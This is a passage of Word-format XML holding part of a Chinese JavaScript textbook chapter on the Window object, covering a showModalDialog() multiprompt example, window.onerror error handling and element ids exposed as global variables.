      <w:r>
        <w:t>showModalDialog()</w:t>
      </w:r>
      <w:r>
        <w:t>的</w:t>
      </w:r>
      <w:r>
        <w:t>HTML</w:t>
      </w:r>
      <w:r>
        <w:t>文件。代码顶部</w:t>
      </w:r>
      <w:r>
        <w:t>的注释包含调用</w:t>
      </w:r>
      <w:r>
        <w:t>showModalDialog()</w:t>
      </w:r>
      <w:r>
        <w:t>的样例，而图</w:t>
      </w:r>
      <w:r>
        <w:t>14-1</w:t>
      </w:r>
      <w:r>
        <w:t>显示了通过示例代码创建的对话框。注意对话框里显示的大量文本都来自</w:t>
      </w:r>
      <w:r>
        <w:t>showModalDialog()</w:t>
      </w:r>
      <w:r>
        <w:t>的第二个参数，而不是写死在</w:t>
      </w:r>
      <w:r>
        <w:t>HTML</w:t>
      </w:r>
      <w:r>
        <w:t>里。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para06"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar-SA"/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="0" distR="0" simplePos="0" relativeHeight="251682816" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>center</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="line">
              <wp:align>top</wp:align>
            </wp:positionV>
            <wp:extent cx="4028535" cy="1406105"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapSquare wrapText="bothSides"/>
            <wp:docPr id="24" name="00024.jpeg" descr="00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00024.jpeg"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId27"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4028535" cy="1406105"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:anchor>
        </w:drawing>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para10"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">图　</w:t>
      </w:r>
      <w:r>
        <w:t>14-1</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">　使用</w:t>
      </w:r>
      <w:r>
        <w:t>showModalDialog()</w:t>
      </w:r>
      <w:r>
        <w:t>方法显示出的对话框</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>例</w:t>
      </w:r>
      <w:r>
        <w:t>14-1</w:t>
      </w:r>
      <w:r>
        <w:t>：使用</w:t>
      </w:r>
      <w:r>
        <w:t>showModalDialog()</w:t>
      </w:r>
      <w:r>
        <w:t>的</w:t>
      </w:r>
      <w:r>
        <w:t>HTML</w:t>
      </w:r>
      <w:r>
        <w:t>文件</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>!--</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>这个</w:t>
      </w:r>
      <w:r>
        <w:t>HTML</w:t>
      </w:r>
      <w:r>
        <w:t>文件并不是独立的，这个文件由</w:t>
      </w:r>
      <w:r>
        <w:t>showModalDialog()</w:t>
      </w:r>
      <w:r>
        <w:t>所调用</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>它希望</w:t>
      </w:r>
      <w:r>
        <w:t>window.dialogArguments</w:t>
      </w:r>
      <w:r>
        <w:t>是一个由字符串组成的数组</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>数组的第一个元素将放置在对话框的顶部</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>剩下的每个元素是每行的输入框的标识</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>当单击</w:t>
      </w:r>
      <w:r>
        <w:t>Okey</w:t>
      </w:r>
      <w:r>
        <w:t>按钮的时候，返回一个数组，这个数组是由每个输入框的值组成</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>使用诸如这样的代码来调用：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var p=showModalDialog("multiprompt.html",</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>["Enter 3D point coordinates","x","y","z"],</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>"dialogwidth:400;dialogheight:300;resizable:yes");</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>--</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>form</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>fieldset id="fields"</w:t>
      </w:r>
      <w:r>
        <w:t>＞＜</w:t>
      </w:r>
      <w:r>
        <w:t>/fieldset</w:t>
      </w:r>
      <w:r>
        <w:t>＞＜</w:t>
      </w:r>
      <w:r>
        <w:t>!--</w:t>
      </w:r>
      <w:r>
        <w:t>对话框的正文部分</w:t>
      </w:r>
      <w:r>
        <w:t>--</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>div style="text-align:center"</w:t>
      </w:r>
      <w:r>
        <w:t>＞＜</w:t>
      </w:r>
      <w:r>
        <w:t>!--</w:t>
      </w:r>
      <w:r>
        <w:t>关闭这个对话框的按钮</w:t>
      </w:r>
      <w:r>
        <w:t>--</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>button onclick="okay()"</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
      <w:r>
        <w:t>Okay</w:t>
      </w:r>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>/button</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>!--</w:t>
      </w:r>
      <w:r>
        <w:t>设置返回值和关闭事件</w:t>
      </w:r>
      <w:r>
        <w:t>--</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>button onclick="cancel()"</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
      <w:r>
        <w:t>Cancel</w:t>
      </w:r>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>/butt</w:t>
      </w:r>
      <w:r>
        <w:t>on</w:t>
      </w:r>
      <w:r>
        <w:t>＞＜</w:t>
      </w:r>
      <w:r>
        <w:t>!--</w:t>
      </w:r>
      <w:r>
        <w:t>关闭时不带任何返回值</w:t>
      </w:r>
      <w:r>
        <w:t>--</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>/div</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>script</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>创建对话框的主体部分，并在</w:t>
      </w:r>
      <w:r>
        <w:t>fieldset</w:t>
      </w:r>
      <w:r>
        <w:t>中显示出来</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var args=dialogArguments;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var text="</w:t>
      </w:r>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>legend</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
      <w:r>
        <w:t>"+args[0]+"</w:t>
      </w:r>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>/legend</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
      <w:r>
        <w:t>";</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>for(var i=1;i</w:t>
      </w:r>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>args.length;i++)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>text+="</w:t>
      </w:r>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>label</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
      <w:r>
        <w:t>"+args[i]+":</w:t>
      </w:r>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>input id='f"+i+"'</w:t>
      </w:r>
      <w:r>
        <w:t>＞＜</w:t>
      </w:r>
      <w:r>
        <w:t>/label</w:t>
      </w:r>
      <w:r>
        <w:t>＞＜</w:t>
      </w:r>
      <w:r>
        <w:t>br</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
      <w:r>
        <w:t>";</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>document.getElementById("fields")</w:t>
      </w:r>
      <w:r>
        <w:t>.innerHTML=text;//</w:t>
      </w:r>
      <w:r>
        <w:t>直接关闭这个对话框，不设置返回值</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>function cancel(){window.close();}//</w:t>
      </w:r>
      <w:r>
        <w:t>读取输入框的值，然后设置一个返回值，之后关闭</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>function okay(){</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>window.returnValue=[];//</w:t>
      </w:r>
      <w:r>
        <w:t>返回一个数组</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>for(var i=1;i</w:t>
      </w:r>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>args.length;i++)//</w:t>
      </w:r>
      <w:r>
        <w:t>设置输入框的元素</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>window.returnValue[i-1]=document.getElementById("f"+i).value;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>window.close();//</w:t>
      </w:r>
      <w:r>
        <w:t>关闭对话框，使</w:t>
      </w:r>
      <w:r>
        <w:t>showModalDialog()</w:t>
      </w:r>
      <w:r>
        <w:t>返回</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/form</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:spacing w:before="240" w:after="240"/>
      </w:pPr>
      <w:bookmarkStart w:id="345" w:name="14_6_Cuo_Wu_Chu_Li_"/>
      <w:r>
        <w:t>14.6</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">　错误处理</w:t>
      </w:r>
      <w:bookmarkEnd w:id="345"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Window</w:t>
      </w:r>
      <w:r>
        <w:t>对象的</w:t>
      </w:r>
      <w:r>
        <w:t>onerror</w:t>
      </w:r>
      <w:r>
        <w:t>属性是一个事件处理程序，当未捕获的异常传播到调用栈上时就会调用它，并把错误消息输出到浏览器的</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>控制台上。如果给这个属性赋一个函数，那么只要这个窗口中发生了</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>错误，就会调用该函数，即它成了窗口的错误处理程序。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>由于历史原因，</w:t>
      </w:r>
      <w:r>
        <w:t>Window</w:t>
      </w:r>
      <w:r>
        <w:t>对象的</w:t>
      </w:r>
      <w:r>
        <w:t>onerror</w:t>
      </w:r>
      <w:r>
        <w:t>事件处理函数的调用通过三个字符串参数，而</w:t>
      </w:r>
      <w:r>
        <w:t>不是通过通常传递的一个事件对象。（其他客户端对象的</w:t>
      </w:r>
      <w:r>
        <w:t>onerror</w:t>
      </w:r>
      <w:r>
        <w:t>处理程序所需要的错误条件是不一样的，但是它们都是正常的事件处理程序，向这个函数只须传入一个事件对象。）</w:t>
      </w:r>
      <w:r>
        <w:t>window.onerror</w:t>
      </w:r>
      <w:r>
        <w:t>的第一个参数是描述错误的一条消息。第二个参数是一个字符串，它存放引发错误的</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>代码所在的文档的</w:t>
      </w:r>
      <w:r>
        <w:t>URL</w:t>
      </w:r>
      <w:r>
        <w:t>。第三个参数是文档中发生错误的行数。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>除了这三个参数之外，</w:t>
      </w:r>
      <w:r>
        <w:t>onerror</w:t>
      </w:r>
      <w:r>
        <w:t>处理程序的返回值也很重要。如果</w:t>
      </w:r>
      <w:r>
        <w:t>onerror</w:t>
      </w:r>
      <w:r>
        <w:t>处理程序返回</w:t>
      </w:r>
      <w:r>
        <w:t>false</w:t>
      </w:r>
      <w:r>
        <w:t>，它通知浏览器事件处理程序已经处理了错误，不需要其他操作。换句话</w:t>
      </w:r>
      <w:r>
        <w:t>说，浏览器不应该显示它自己的错误消息。遗憾的是，由于历史原因，</w:t>
      </w:r>
      <w:r>
        <w:t>Firefox</w:t>
      </w:r>
      <w:r>
        <w:t>里的错误处理程序必须返回</w:t>
      </w:r>
      <w:r>
        <w:t>true</w:t>
      </w:r>
      <w:r>
        <w:t>来表示它已经处理了错误。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>onerror</w:t>
      </w:r>
      <w:r>
        <w:t>处理程序是早期</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>的遗物，那时语言核心不包含</w:t>
      </w:r>
      <w:r>
        <w:t>try/catch</w:t>
      </w:r>
      <w:r>
        <w:t>异常处理语句。现代代码已经很少使用它。但是，</w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>在开发阶段，你可能要像这样定义一个错误处理程序，当有错误发生时，来显式地通知你：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>在一个对话框中弹出错误消息，但不超过三次</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>window.onerror=function(msg,url,line){</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>if(onerror.num++</w:t>
      </w:r>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>onerror.max){</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>alert("ERROR:"+msg+"\n"+url+":"+line);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>return true;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>onerror.max=3;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>onerror.num=0;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:spacing w:before="240" w:after="240"/>
      </w:pPr>
      <w:bookmarkStart w:id="346" w:name="14_7_Zuo_Wei_WindowDui_Xiang_Shu_Xing_De"/>
      <w:r>
        <w:t>14.7</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">　作为</w:t>
      </w:r>
      <w:r>
        <w:t>Window</w:t>
      </w:r>
      <w:r>
        <w:t>对象属性的文档元素</w:t>
      </w:r>
      <w:bookmarkEnd w:id="346"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>如果在</w:t>
      </w:r>
      <w:r>
        <w:t>HTML</w:t>
      </w:r>
      <w:r>
        <w:t>文档中用</w:t>
      </w:r>
      <w:r>
        <w:t>id</w:t>
      </w:r>
      <w:r>
        <w:t>属性来为元素命名，并且如果</w:t>
      </w:r>
      <w:r>
        <w:t>Window</w:t>
      </w:r>
      <w:r>
        <w:t>对象没有此名字的属性，</w:t>
      </w:r>
      <w:r>
        <w:t>Window</w:t>
      </w:r>
      <w:r>
        <w:t>对象会赋予一个属性，它的名字是</w:t>
      </w:r>
      <w:r>
        <w:t>id</w:t>
      </w:r>
      <w:r>
        <w:t>属性的值，而它们的值指向表示文档元素的</w:t>
      </w:r>
      <w:r>
        <w:t>HTMLElement</w:t>
      </w:r>
      <w:r>
        <w:t>对象。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>我们已经说过，在客户端</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>中，</w:t>
      </w:r>
      <w:r>
        <w:t>Window</w:t>
      </w:r>
      <w:r>
        <w:t>对象是</w:t>
      </w:r>
      <w:r>
        <w:t>以全局对象的形式存在于作用域链的最上层，这就意味着在</w:t>
      </w:r>
      <w:r>
        <w:t>HTML</w:t>
      </w:r>
      <w:r>
        <w:t>文档中使用的</w:t>
      </w:r>
      <w:r>
        <w:t>id</w:t>
      </w:r>
      <w:r>
        <w:t>属性会成为可以被脚本访问的全局变量。如果文档包含一个＜</w:t>
      </w:r>
      <w:r>
        <w:t>button id="okay"/</w:t>
      </w:r>
      <w:r>
        <w:t>＞元素，可以通过全局变量</w:t>
      </w:r>
      <w:r>
        <w:t>okay</w:t>
      </w:r>
      <w:r>
        <w:t>来引用此元素。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>但是，有一个重要的警告：如果</w:t>
      </w:r>
      <w:r>
        <w:t>Window</w:t>
      </w:r>
      <w:r>
        <w:t>对象已经具有此名字的属性，这就不会发生。比如，</w:t>
      </w:r>
      <w:r>
        <w:t>id</w:t>
      </w:r>
      <w:r>
        <w:t>是</w:t>
      </w:r>
      <w:r>
        <w:t>"history"</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>"location"</w:t>
      </w:r>
      <w:r>
        <w:t>或</w:t>
      </w:r>
      <w:r>
        <w:t>"navigator"</w:t>
      </w:r>
      <w:r>
        <w:t>的元素，就不会以全局变量的形式出现，因为这些</w:t>
      </w:r>
      <w:r>
        <w:t>ID</w:t>
      </w:r>
      <w:r>
        <w:t>已经占用了。同样，如果</w:t>
      </w:r>
      <w:r>
        <w:t>HTML</w:t>
      </w:r>
      <w:r>
        <w:t>文档包含一个</w:t>
      </w:r>
      <w:r>
        <w:t>id</w:t>
      </w:r>
      <w:r>
        <w:t>为</w:t>
      </w:r>
      <w:r>
        <w:t>"x"</w:t>
      </w:r>
      <w:r>
        <w:t>的元素，并且还在代码中声明并赋值给全局变量</w:t>
      </w:r>
      <w:r>
        <w:t>x</w:t>
      </w:r>
      <w:r>
        <w:t>，那么显式声明的变量会隐藏隐式的元素变量。如果脚本中的变量声明出现在命名元素之前，那这个变量的存在就会阻止元素获取它的</w:t>
      </w:r>
      <w:r>
        <w:t>window</w:t>
      </w:r>
      <w:r>
        <w:t>属性。而如果脚本中的变量声明出现在命名元素之后，那么变量的显式赋值会覆盖该属性的</w:t>
      </w:r>
      <w:r>
        <w:t>隐式值。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>在</w:t>
      </w:r>
      <w:r>
        <w:t>15.2</w:t>
      </w:r>
      <w:r>
        <w:t>节中，你会学到通过</w:t>
      </w:r>
      <w:r>
        <w:t>document.getElementById()</w:t>
      </w:r>
      <w:r>
        <w:t>方法，用</w:t>
      </w:r>
      <w:r>
        <w:t>HTML</w:t>
      </w:r>
      <w:r>
        <w:t>的</w:t>
      </w:r>
      <w:r>
        <w:t>id</w:t>
      </w:r>
      <w:r>
        <w:t>属性来查找文档元素。见下面的例子：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var ui=["input","prompt","heading"];//</w:t>
      </w:r>
      <w:r>
        <w:t>数组中存放要查找的元素</w:t>
      </w:r>
      <w:r>
        <w:t>id</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>ui.forEach(function(id){//</w:t>
      </w:r>
      <w:r>
        <w:t>用每个</w:t>
      </w:r>
      <w:r>
        <w:t>id</w:t>
      </w:r>
      <w:r>
        <w:t>查找对应的元素</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
